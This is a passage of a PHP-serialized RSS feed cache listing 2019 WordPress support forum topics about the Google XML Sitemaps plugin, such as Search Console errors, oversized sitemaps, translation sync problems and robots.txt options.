2019 15:08:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:535:\"\n						\n						<p>Replies: 0</p>\n						<p>Hi,</p>\n<p>I&#8217;m using your sitemap to generate all urls for cache preloading. It&#8217;s possible in taxonomy pages for product categories add all pages and not only the first:</p>\n<p>/product-category/x/page/1/<br />\n/product-category/x/page/2/<br />\n/product-category/x/page/3/<br />\n/product-category/x/page/4/<br />\n&#8230;</p>\n<p>Where in code change this to get all pages in product categories.<br />\nAny help is welcome! Thx.</p>\n<p>Best Regards,<br />\nDiogo Coelho</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"milagem\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"https://wordpress.org/support/topic/rss-sitemap-is-not-validating/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:150:\"&lt;span class=&quot;resolved&quot; aria-label=&quot;Resolved&quot; title=&quot;Topic is resolved.&quot;&gt;&lt;/span&gt;RSS Sitemap is not validating\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"https://wordpress.org/support/topic/rss-sitemap-is-not-validating/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Aug 2019 21:07:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:168:\"\n						\n						<p>Replies: 1</p>\n						<p>The RSS Sitemap generated by Google XML Sitemap Generator is not validating and does not work in feed readers.</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Peter Ditzel\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"https://wordpress.org/support/topic/google-console-says-sitemap-is-not-supported-format/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:172:\"&lt;span class=&quot;resolved&quot; aria-label=&quot;Resolved&quot; title=&quot;Topic is resolved.&quot;&gt;&lt;/span&gt;Google Console says sitemap is not supported format\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"https://wordpress.org/support/topic/google-console-says-sitemap-is-not-supported-format/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Aug 2019 21:01:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:188:\"\n						\n						<p>Replies: 1</p>\n						<p>Google console is now saying &#8220;Your Sitemap does not appear to be in a supported format.&#8221; I am running WordPress 5.2.2.</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Peter Ditzel\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"https://wordpress.org/support/topic/the-translation-is-invalid/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"The translation is invalid.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"https://wordpress.org/support/topic/the-translation-is-invalid/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 04 Aug 2019 17:13:40 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:443:\"\n						\n						<p>Replies: 0</p>\n						<p>The original translation has a lot of errors, but the new translations can&#8217;t be synchronized!<br />\nThe translation is invalid.<br />\nTranslations cannot be synced.<br />\n<a href=\"https://translate.wordpress.org/locale/zh-cn/default/wp-plugins/google-sitemap-generator/\" rel=\"nofollow\">https://translate.wordpress.org/locale/zh-cn/default/wp-plugins/google-sitemap-generator/</a></p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"CoCoowordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://wordpress.org/support/topic/no-urls-shown/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"no urls shown\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://wordpress.org/support/topic/no-urls-shown/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 31 Jul 2019 20:14:08 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:190:\"\n						\n						<p>Replies: 1</p>\n						<p>Google says it can read the xml, but there are zero (0) urls visible. my blog has more than 1000 urls.</p>\n<p>please help<br />\nKarl</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"KWiesner\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://wordpress.org/support/topic/could-not-get/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"could not get\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://wordpress.org/support/topic/could-not-get/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 30 Jul 2019 16:37:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:333:\"\n						\n						<p>Replies: 0</p>\n						<p>Google Search Console cannot read the sitemap. The message that comes out is: &#8220;No se ha podido obtener&#8221; and &#8220;No se ha podido leer el sitemap. Error general de HTTP&#8221;.</p>\n<p>It only happens for two or three weeks.</p>\n<p>Best Regards<br />\nSamuel Soler</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"samilyjones5\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"https://wordpress.org/support/topic/is-added-trailing-slash-to-custom-xslt-url/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"Is added trailing slash to custom XSLT url\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"https://wordpress.org/support/topic/is-added-trailing-slash-to-custom-xslt-url/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 25 Jul 2019 13:42:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:706:\"\n						\n						<p>Replies: 0</p>\n						<p>From version 4.1.0 is being added a trailing slash to custom XSLT url. For example if I set as stylesheet url<br />\n<code>https://example.com/custom-style.xsl</code><br />\nafter saving it becomes<br />\n<code>https://example.com/custom-style.xsl/</code></p>\n<p>The error is located in <strong>sitemap-ui.php:311</strong></p>\n\n\n<ul id=\"bbp-topic-revision-log-11766898\" class=\"bbp-topic-revision-log\">\n\n	<li id=\"bbp-topic-revision-log-11766898-item-11766903\" class=\"bbp-topic-revision-log-item\">\n		This topic was modified 1 month ago by <a href=\"https://wordpress.org/support/users/uatania/\" title=\"View Umberto&#039;s profile\">Umberto</a>.\n	</li>\n\n</ul>\n\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Umberto\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"https://wordpress.org/support/topic/posts-not-showing-up-in-google-search-console-sitemap/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"Posts not showing up in Google Search Console Sitemap\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"https://wordpress.org/support/topic/posts-not-showing-up-in-google-search-console-sitemap/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 23 Jul 2019 18:22:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1127:\"\n						\n						<p>Replies: 0</p>\n						<p>My posts are showing up in my sitemap located here: <a href=\"https://sizzleandsear.com/sitemap.xml\" rel=\"nofollow\">https://sizzleandsear.com/sitemap.xml</a></p>\n<p>However, in Google Search Console, it&#8217;s completely bypassing the following sitemaps:</p>\n<p><a href=\"https://sizzleandsear.com/sitemap-pt-post-2019-07.xml\" rel=\"nofollow\">https://sizzleandsear.com/sitemap-pt-post-2019-07.xml</a>	2019-07-23 16:02<br />\n<a href=\"https://sizzleandsear.com/sitemap-pt-post-2019-03.xml\" rel=\"nofollow\">https://sizzleandsear.com/sitemap-pt-post-2019-03.xml</a>	2019-03-17 21:24<br />\n<a href=\"https://sizzleandsear.com/sitemap-pt-post-2018-10.xml\" rel=\"nofollow\">https://sizzleandsear.com/sitemap-pt-post-2018-10.xml</a>	2019-07-23 15:54<br />\n<a href=\"https://sizzleandsear.com/sitemap-pt-post-2018-08.xml\" rel=\"nofollow\">https://sizzleandsear.com/sitemap-pt-post-2018-08.xml</a>	2019-07-23 15:07</p>\n<p>Anyone know why? I&#8217;d hate to have to restructure my site and make all my &#8220;posts&#8221; pages&#8230; but I will if they don&#8217;t get indexed properly.  </p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"sizzlefoodblog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"https://wordpress.org/support/topic/issues-membership-site-query-strings/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"Issues: membership site, query strings\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"https://wordpress.org/support/topic/issues-membership-site-query-strings/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 18 Jul 2019 16:05:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:815:\"\n						\n						<p>Replies: 0</p>\n						<p>My site <a href=\"https://www.agingsafely.com\" rel=\"nofollow\">http://www.agingsafely.com</a> has front-side pages that are only visible to our employees, to use to manage our tables in the database. This plugin adds them to the sitemap, even though Google will get an error viewing them. Also we have a couple of pages with shortcodes and query-strings that generate different content based on the query-string. This plugin doesn&#8217;t add them to the sitemap. We even have our own html sitemap page that lists these query-string dependant pages so Google can find them.</p>\n<p>So options to allow for these situations would be nice.  In the near-term, I am going to have to use an online sitemap generator to get a more complete sitemap.</p>\n<p>/Dave Snow</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"DavidWSnow\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"https://wordpress.org/support/topic/about-the-option-add-sitemap-url-to-the-virtual-robots-txt-file/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"About the option Add sitemap URL to the virtual robots.txt file\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"https://wordpress.org/support/topic/about-the-option-add-sitemap-url-to-the-virtual-robots-txt-file/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 14 Jul 2019 12:23:16 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:500:\"\n						\n						<p>Replies: 0</p>\n						<p>In the plugin&#8217;s Basic Options, an option is Add sitemap URL to the virtual robots.txt file.</p>\n<p>And it says &#8220;The virtual robots.txt generated by WordPress is used. A real robots.txt file must NOT exist in the site directory!&#8221;</p>\n<p>What does this mean? I have a robots.txt file (which I think is a must) in my site&#8217;s root directory, so do I need to disable this option? And is this option important?</p>\n<p>Thanks!</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"philip2041\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://wordpress.org/support/topic/too-many-urls-3/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Too many urls\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://wordpress.org/support/topic/too-many-urls-3/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 13 Jul 2019 13:01:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:332:\"\n						\n						<p>Replies: 1</p>\n						<p>Hello,</p>\n<p>I have a WooCommerce website with lots of products. When generating XML sitemap posts are split into months, but still one xml contains more than 50.000 products, which produces an error in google. Is it possible to split xml into smaller pieces?</p>\n<p>Thanks</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"donataskibartas\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://wordpress.org/support/topic/image-and-video-sitemaps/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Image and Video Sitemaps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://wordpress.org/support/topic/image-and-video-sitemaps/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 11 Jul 2019 15:04:17 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:110:\"\n						\n						<p>Replies: 1</p>\n						<p>Google XML Sitemaps create image and video sitemaps?</p>\n						\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"on_edge\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:67:\"\n					\n					\n					\n					\n					\n\n					\n					\n\n					\n					\n					\n				\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:107:\"https://wordpress.org/support/topic/cannot-update-google-xml-sitemaps-after-wordpress-is-upgraded-to-5-2-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:191:\"&lt;span class=&quot;resolved&quot; aria-label=&quot;Resolved&quot; title=&quot;Topic is resolved.&quot;&gt;&lt;/span&gt;Cannot update Google XML Sitemaps after WordPress is upgraded to 